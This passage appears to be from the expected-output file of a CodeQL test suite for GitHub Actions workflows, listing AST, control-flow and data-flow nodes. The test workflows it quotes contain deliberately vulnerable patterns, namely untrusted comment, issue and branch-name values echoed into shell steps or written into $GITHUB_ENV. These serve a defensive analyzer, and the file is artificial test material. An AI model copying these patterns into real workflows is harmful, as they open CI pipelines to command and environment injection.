.github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | 
-| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed 
files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | 
mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | 
.github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | 
.github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | 
echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| 
.github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:1:1:89:35 | enter on: | -| .github/workflows/multiline2.yml:1:1:89:35 | exit on: | -| .github/workflows/multiline2.yml:1:1:89:35 | exit on: (normal) | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < 
file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| 
.github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| 
.github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python 
scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| 
.github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | 
steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| 
.github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | 
